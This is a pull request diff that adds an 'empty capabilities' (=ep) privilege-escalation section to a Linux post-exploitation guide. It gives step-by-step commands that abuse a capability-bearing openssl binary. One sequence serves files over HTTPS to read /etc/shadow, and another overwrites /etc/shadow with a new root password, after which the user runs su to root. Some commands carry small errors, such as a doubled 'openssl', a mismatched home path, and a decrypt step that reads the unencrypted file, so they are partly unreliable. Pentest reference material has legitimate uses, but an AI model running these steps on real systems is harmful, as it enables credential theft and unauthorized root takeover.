### PR TITLE
Added "empty capabilities" privesc

### DIFF
--- a/post-exploitation/privesc-linux.md
+++ b/post-exploitation/privesc-linux.md
@@ -554,6 +554,63 @@ getcap -r /
 getcap -r /etc
 ```
 
+### The special case of "empty" capabilities
+
+> Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process.
+
+Or, simply put, if you have a binary that:
+
+1. is not owned by root
+2. has no `SUID`/`SGID` bits set
+3. has empty capabilities set (e.g.: `getcap myelf` returns `myelf =ep`)
+
+then that binary will run as root.
+
+Let's say, for example, you find a copy of `openssl` hidden somewhere (a user's home folder, for example), you could use it to read any file you wanted, like this:
+
+```bash
+# Make some SSL certificate
+cd /tmp
+openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
+
+# Start our "empty capabilities binary"
+# For this example we are
+#   uid=1000(mydummyuser) gid=1000(mydummyuser) groups=1000(mydummyuser) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+# and our openssl elf is in our home directory
+#   -rwxr-xr-x. 1 mydummyuser mydummyuser 555296 Apr 1  2019 /home/mydummyuser/openssl
+#   /home/mydummyuser/openssl =ep
+# First, we change directory to the root filesystem, because openssl's HTTP server
+# interprets GET requests relative to pwd/cwd
+# That means, if you are in /home/mydummyuser when you start the server,
+# and you request 'https://localhost:1337/etc/shadow',
+# it would try to server '/home/mydummyuser/etc/shadow' and would fail, as it does not exist
+# (and probably even if it did, it would not be what we wanted)
+# Also, using '..' in the path, to trick it to access files from parent directories, does not work
+cd /
+/home/mydummyuser/openssl openssl s_server -key /tmp/key.pem -cert /tmp/cert.pem -port 1337 -HTTP
+# Now we can read any file, with curl (use '-k' to ignore ssl trust issues)
+curl -k https://localhost:1337/etc/shadow
+```
+
+But we could go a step further: rewrite `/etc/shadow` to change the root password. Since we already have the original file, all we need to do is change the root password, and then abuse openssl's encrypt/decrypt functions.
+
+Assuming we already changed the root password and saved the new file as `/home/mydummyuser/shadow.custom`, we first need to encrypt it (so we have what to decrypt):
+
+```bash
+# We are reusing the certificates created before
+openssl smime -encrypt -aes256 -in /home/mydummyuser/shadow.custom -binary -outform DER -out /home/mydummyuser/shadow.custom.enc /tmp/cert.pem
+```
+
+And then we decrypt it with:
+
+```bash
+/home/ldapuser1/openssl smime -decrypt -in /home/mydummyuser/shadow.custom -inform DER -inkey /tmp/key.pem -out /etc/shadow
+```
+
+Now, all we need to do is `su - root`, et voilà!
+
+*Most of this content is from [here](https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099)*.
+
 ## GNU C Library
 
 There is an [obscure C Library exploit](https://www.exploit-db.com/exploits/15304/) that isn't obvious unless you check for the GNU C library version:
@@ -604,4 +661,4 @@ Options:
 * [Linux privilege escalation by xapax](https://xapax.gitbooks.io/security/content/privilege_escalation_-_linux.html)
 * [Basic Linux privilege escalation by g0tmi1k](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 * [Privilege escalation cheat sheet](https://guif.re/linuxeop)
-
+* [POSIX file capabilities, the dark side](http://blog.sevagas.com/?POSIX-file-capabilities-the-dark-side)


### PR DESCRIPTION
Added a privesc method involving empty capabilities (=ep), with ample example.
First discovered here: https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
More info here: http://blog.sevagas.com/?POSIX-file-capabilities-the-dark-side http://blog.sevagas.com/IMG/pdf/exploiting_capabilities_the_dark_side.pdf